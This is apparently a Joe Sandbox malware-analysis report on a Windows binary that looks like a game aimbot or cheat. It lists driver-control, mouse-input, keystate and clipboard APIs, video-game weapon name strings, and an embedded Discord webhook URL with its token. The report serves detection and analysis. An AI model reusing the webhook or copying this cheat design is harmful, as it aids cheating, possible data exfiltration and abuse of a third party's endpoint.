Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_taskExceptionThrow
String ID: exists$https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
API String ID: 2708383850-3501797402
Opcode ID: 74baa2162864e6956a34f70519118e6c3a6bce27ea85730787bdfad066606682
Instruction ID: 875f369685a97edffbbf0f29c0f8c02b1e0326221043227b546035b9413160b7
Opcode Fuzzy Hash: 74baa2162864e6956a34f70519118e6c3a6bce27ea85730787bdfad066606682
Instruction Fuzzy Hash: D623A653E79BCAD4FB21EB34C8857F91311AB96398F105321E65C95AA6EF6CB6C4C300

Function 00007FF67417D730 Relevance: 67.5, APIs: 19, Strings: 19, Instructions: 1002keyboardCOMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417D78A
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417D79D
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417D7B4
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417D7D6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417DD79

Part of subcall function 00007FF67418A130: DeviceIoControl.KERNEL32 ref: 00007FF67418A1E9

Part of subcall function 00007FF67418A030: DeviceIoControl.KERNEL32 ref: 00007FF67418A0E9

Part of subcall function 00007FF67418A300: DeviceIoControl.KERNEL32 ref: 00007FF67418A3EC

Part of subcall function 00007FF6741727C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741728B1

Part of subcall function 00007FF674172330: DeviceIoControl.KERNEL32 ref: 00007FF6741723ED

Part of subcall function 00007FF67418A220: DeviceIoControl.KERNEL32 ref: 00007FF67418A2D5

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417E027
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417E046
memchr.VCRUNTIME140 ref: 00007FF67417E0F0
memchr.VCRUNTIME140 ref: 00007FF67417E12C
memchr.VCRUNTIME140 ref: 00007FF67417E15E

Part of subcall function 00007FF67417D730: sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417E068
Part of subcall function 00007FF67417D730: memchr.VCRUNTIME140 ref: 00007FF67417E18B
Part of subcall function 00007FF67417D730: memchr.VCRUNTIME140 ref: 00007FF67417E1BD
Part of subcall function 00007FF67417D730: memchr.VCRUNTIME140 ref: 00007FF67417E1EB
Part of subcall function 00007FF67417D730: memchr.VCRUNTIME140 ref: 00007FF67417E220
Part of subcall function 00007FF67417D730: memchr.VCRUNTIME140 ref: 00007FF67417E255

SendInput.USER32 ref: 00007FF67417E3FE
GetAsyncKeyState.USER32 ref: 00007FF67417E427

Strings

Tactical Assault Rifle, xrefs: 00007FF67417DBBA
Hunting Rifle, xrefs: 00007FF67417D904
Bolt-Action Sniper Rifle, xrefs: 00007FF67417D851
Pump Shotgun, xrefs: 00007FF67417D978
Snip, xrefs: 00007FF67417E230
Suppressed SMG, xrefs: 00007FF67417DA53
Compact SMG, xrefs: 00007FF67417DA9F
Scoped Assault Rifle, xrefs: 00007FF67417DC2E
Thermal Scoped Assault Rifle, xrefs: 00007FF67417DBF4
Rifl, xrefs: 00007FF67417E1C7
Charge Shotgun, xrefs: 00007FF67417DA04
Rapid Fire SMG, xrefs: 00007FF67417DADF
Storm Scout Sniper Rifle, xrefs: 00007FF67417D8CA
Shot, xrefs: 00007FF67417E100
Tactical Shotgun, xrefs: 00007FF67417D9C4
Reaper Sniper Rifle, xrefs: 00007FF67417D817
Assault Rifle, xrefs: 00007FF67417DB2E
Heavy Sniper Rifle, xrefs: 00007FF67417D890
Burst Assault Rifle, xrefs: 00007FF67417DB7A

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memchr$ControlDevice$_invalid_parameter_noinfo_noreturnsqrt$AsyncInputSendState
String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
API String ID: 175615221-766504981
Opcode ID: 1caa445faf76c763df1c070efffc9ed14ff11df3b4b25bc150dd399170ce5fdc
Instruction ID: 649cfc0150304ea0d06f8afc5ddcd35155d5b5a9d75c6b037a18755be1f23609
Opcode Fuzzy Hash: 1caa445faf76c763df1c070efffc9ed14ff11df3b4b25bc150dd399170ce5fdc
Instruction Fuzzy Hash: 65A2A723E2CB86C5EA12EB35D4883B463A0AF557A4F148732D96DA77E5DF7CB5818300

Function 00007FF67418DADC Relevance: 33.2, APIs: 22, Instructions: 224
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF67418DB89
GetLastError.KERNEL32 ref: 00007FF67418DB93
FindFirstFileW.KERNEL32 ref: 00007FF67418DBAA
GetLastError.KERNEL32 ref: 00007FF67418DBB6
FindClose.KERNEL32 ref: 00007FF67418DBC4
__std_fs_open_handle.LIBCPMT ref: 00007FF67418DC57
CloseHandle.KERNEL32 ref: 00007FF67418DC6D
CloseHandle.KERNEL32 ref: 00007FF67418DDEA
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67418DDF4

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: a9d238aedac359b228b14c991d560575364a6824095be2b364f9a602f4a28b3a
Instruction ID: 356a007d055aa44cf2255d77e201a1af92281c96308a850af5017ec8016a7fe1
Opcode Fuzzy Hash: a9d238aedac359b228b14c991d560575364a6824095be2b364f9a602f4a28b3a
Instruction Fuzzy Hash: 0791A233B28B42C6E664AB25A88867927A4AF957B4F084334D9BEC77D4DF3CE401C700

Function 00007FF67417ECC0 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1A5
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1C0
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1D9
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1F7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417F2F7

Part of subcall function 00007FF67418C9D8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF674152AC0), ref: 00007FF67418C9E8

mouse_event.USER32 ref: 00007FF67417F299

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988

Part of subcall function 00007FF67417E8B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6

Part of subcall function 00007FF67417E8B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E965

Part of subcall function 00007FF67418CF54: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF67418B925,?,?,?,?,?,00007FF674189E95), ref: 00007FF67418CF6E

mouse_event.USER32 ref: 00007FF67417F2B1

Strings

SingleShotgun, xrefs: 00007FF67417EE91
DragonBreathShotgun, xrefs: 00007FF67417EE1F
ChargeShotgun, xrefs: 00007FF67417EDD3
LeverActionShotgun, xrefs: 00007FF67417EDF9
PumpShotgun, xrefs: 00007FF67417ED86
AutoShotgun, xrefs: 00007FF67417EE6B
TacticalShotgun, xrefs: 00007FF67417EDAC
SlugShotgun, xrefs: 00007FF67417EEDD
CombatShotgun, xrefs: 00007FF67417EEB7
DoubleBarrelShotgun, xrefs: 00007FF67417EE45

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpymouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
API String ID: 2172613484-4283324268
Opcode ID: 2eb0c79e253c57d9920e8173fe96c0999fa43dce57571fed94bcb779acbfa6ea
Instruction ID: 299e6972fe772f45ea7843c0dc3952133a4d4d9ee4b77010b45cebbddd891c6a
Opcode Fuzzy Hash: 2eb0c79e253c57d9920e8173fe96c0999fa43dce57571fed94bcb779acbfa6ea
Instruction Fuzzy Hash: 4102A423E38B86C5E711EB35D8853F96361BF953A4F549332EA5C92695EF7CA580C300

Function 00007FF67415F8F0 Relevance: 26.0, APIs: 20, Instructions: 1048COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415F9B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415F9D7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415FAB1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415FADD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415FB7A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415FC28
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415FC4B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415FC75
memset.VCRUNTIME140 ref: 00007FF67415FC8D
memset.VCRUNTIME140 ref: 00007FF67415FC9B
memset.VCRUNTIME140 ref: 00007FF67415FCA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741601C5
memset.VCRUNTIME140 ref: 00007FF6741601DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741603BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741603DA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674160833
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674160854
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674160875
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674160414

Part of subcall function 00007FF674161180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6741609B3), ref: 00007FF6741611E3
Part of subcall function 00007FF674161180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6741609B3), ref: 00007FF674161214

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741609F5

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free$malloc$memset
String ID:
API String ID: 1620901979-0
Opcode ID: 72a844f201c5ad39abbf54e49f5249660775106968ed64801e1735698d8315b2
Instruction ID: 3a4a60065756a6830fc3041f93a5d79a015d54bdaa6f7766f198cf042c4036f8
Opcode Fuzzy Hash: 72a844f201c5ad39abbf54e49f5249660775106968ed64801e1735698d8315b2
Instruction Fuzzy Hash: E9B2BF73A14B84CAE755DF26D0886BD7BA4FB49B88F058236DE4993754EF38E491CB00

Function 00007FF674155DF0 Relevance: 15.8, APIs: 10, Instructions: 830COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674155F2F
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741564C7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741564F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415699A
memcpy.VCRUNTIME140 ref: 00007FF6741569BD
memcpy.VCRUNTIME140 ref: 00007FF6741569D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741569F7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674156A1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674156A57
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674156A7C

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free$mallocmemcpysqrtf
String ID:
API String ID: 943526449-0
Opcode ID: ed73fb9772e8421709a7575f4193eaeaf6b0d4d4a450a63e0219d27f64c9c0df
Instruction ID: d14e9baa40b0c80a1a91ca4ffa073f94979fc23c8182915a27c449eac70b40ac
Opcode Fuzzy Hash: ed73fb9772e8421709a7575f4193eaeaf6b0d4d4a450a63e0219d27f64c9c0df
Instruction Fuzzy Hash: 9B726F13E28BD885D312973650822B9B7D1AF6E784F19D722FD49E6662DF3CE491C700

Function 00007FF674172F10 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF674172FB8
asin.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417306E
atan2.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741730A1

Part of subcall function 00007FF674171B70: DeviceIoControl.KERNEL32 ref: 00007FF674171BE1

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741731BB
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741731C7
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741731D5
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741731E6
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741731F3
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674173200
tanf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741732B6

Part of subcall function 00007FF67418A030: DeviceIoControl.KERNEL32 ref: 00007FF67418A0E9

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: cosfsinf$ControlDevice$asinatan2memsettanf
String ID:
API String ID: 1330759842-0
Opcode ID: 699a7025857ea82c0c18217e7892348d3648a1f27a8ae830b2d2f4ab04345e4a
Instruction ID: 84509ec5a879c59b92e75fa7f8b291980a972b6007f84890b0e17304098364ac
Opcode Fuzzy Hash: 699a7025857ea82c0c18217e7892348d3648a1f27a8ae830b2d2f4ab04345e4a
Instruction Fuzzy Hash: 87D19923D38F8585E213EB3994852B5A364AF6F3D4F15D332F94D71662EF29A1D28A00

Function 00007FF674152A90 Relevance: 15.1, APIs: 10, Instructions: 149clipboardCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674152B14
OpenClipboard.USER32 ref: 00007FF674152B23

Part of subcall function 00007FF67418C9D8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF674152AC0), ref: 00007FF67418C9E8

GetClipboardData.USER32 ref: 00007FF674152B3F
CloseClipboard.USER32 ref: 00007FF674152B4D

Part of subcall function 00007FF67418C96C: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF674152AEF), ref: 00007FF67418C97C
Part of subcall function 00007FF67418C96C: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00007FF674152AEF), ref: 00007FF67418C9BC

GlobalLock.KERNEL32 ref: 00007FF674152B68
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674152C35
memcpy.VCRUNTIME140 ref: 00007FF674152C54
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674152C77
GlobalUnlock.KERNEL32 ref: 00007FF674152CB6
CloseClipboard.USER32 ref: 00007FF674152CBC

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemcpy
String ID:
API String ID: 2057792927-0
Opcode ID: 2e3ab516b8ba894ed820c2d0740575cdb0534405dfac8718f71a9eab1fc27e0b
Instruction ID: 67ba689c5689930941d82855fc2938406ad1da30390e00a40e8935420ae3d146
Opcode Fuzzy Hash: 2e3ab516b8ba894ed820c2d0740575cdb0534405dfac8718f71a9eab1fc27e0b
Instruction Fuzzy Hash: 30516A67B28A42C2FA54AB19E8D82B963A0AF84B90F544575D90EC77A1DF3CF581CB40

Function 00007FF67416A160 Relevance: 14.2, APIs: 5, Strings: 1, Instructions: 3667stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF67416A7AD
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF67416C0F9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67416C21D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67416C36B
fmodf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416D5CB

Strings

#SCROLLY, xrefs: 00007FF67416A64C, 00007FF67416CCC4

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: fmodffreemallocmemcpystrncpy
String ID: #SCROLLY
API String ID: 511038203-1064663049
Opcode ID: b45b85b28c51426c8233574e15a5e913fa359d2cffe3a2bc40f8a65ab2b2130a
Instruction ID: 878fee6d1227c2337157adfde1fc69b82a5011762ec193d4e5e72a4c0e1b7806
Opcode Fuzzy Hash: b45b85b28c51426c8233574e15a5e913fa359d2cffe3a2bc40f8a65ab2b2130a
Instruction Fuzzy Hash: F2730733E28396C6E711EA3684892B977A0EF5A384F198735DE1DA7691FF29F440C701

Function 00007FF674179B30 Relevance: 14.0, APIs: 9, Instructions: 476COMMON

Download Yara Rule

APIs

__stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674179BCC
MultiByteToWideChar.KERNEL32 ref: 00007FF674179BEE
memset.VCRUNTIME140 ref: 00007FF674179C1C
MultiByteToWideChar.KERNEL32 ref: 00007FF674179C35

Part of subcall function 00007FF674189670: memcpy.VCRUNTIME140(00000000,?,?,00007FF674172701), ref: 00007FF6741896DA

WideCharToMultiByte.KERNEL32 ref: 00007FF674179C82
memset.VCRUNTIME140 ref: 00007FF674179CA3
WideCharToMultiByte.KERNEL32 ref: 00007FF674179CCA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179D38

Part of subcall function 00007FF674161A40: memchr.VCRUNTIME140 ref: 00007FF674161B96
Part of subcall function 00007FF674161A40: memchr.VCRUNTIME140 ref: 00007FF674161BF8

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417A2E6

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemcpy
String ID:
API String ID: 3704722475-0
Opcode ID: 2e1da8238d915b69f7870db45f0b432fbaffb02c73d06a9ec1cadcb7f203864f
Instruction ID: fe979d2188538b49fc2e067c275282f7760df71cfeef9e27a2de89f340d43659
Opcode Fuzzy Hash: 2e1da8238d915b69f7870db45f0b432fbaffb02c73d06a9ec1cadcb7f203864f
Instruction Fuzzy Hash: 9B22AD33A28BC5C5E711EB75E4842B96760FB99798F049332EE8D67A59DF38E184C700

Function 00007FF6741597A0 Relevance: 12.3, APIs: 8, Instructions: 254COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674159892
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741598C0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741598EF
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415991A
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674159B18
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674159B46
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674159B75
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674159BA0

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: sqrtf
